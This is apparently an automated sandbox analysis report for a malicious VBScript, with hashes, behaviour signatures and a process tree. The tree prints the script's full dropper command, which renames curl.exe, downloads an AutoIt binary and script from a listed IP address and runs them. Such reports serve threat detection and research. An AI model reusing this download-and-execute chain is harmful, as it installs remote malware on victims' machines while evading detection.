Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
  • submitted
    02/10/2023, 13:33

General

  • Target

    mkpub_XJZ.vbs

  • Size

    3KB

  • MD5

    f291fb33af097675047e8818db037f7a

  • SHA1

    a3c614d7d71468d9a1018935fdcd5891c24c027c

  • SHA256

    8fa02af99bf10e756bc61dd214f3470ac85c2eb646c78f8fd2aa7932bc72c6bb

  • SHA512

    96c61b9ed56f3ea2545da04be878d46f98e056f37852176ffc02f986e3499a6af47cacb2bbf7a881a7bd117d09a5438f4ad03902f9fccc8f0fc0275f44e6b934

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\mkpub_XJZ.vbs"
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2724
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir c:\rqdp & cd /d c:\rqdp & copy c:\windows\system32\curl.exe rqdp.exe & rqdp -H "User-Agent: curl" -o Autoit3.exe http://81.19.135.17:2351 & rqdp -o ccwpjf.au3 http://81.19.135.17:2351/msirqdppgyg & Autoit3.exe ccwpjf.au3
        PID:3008

Network

MITRE ATT&CK Enterprise v15
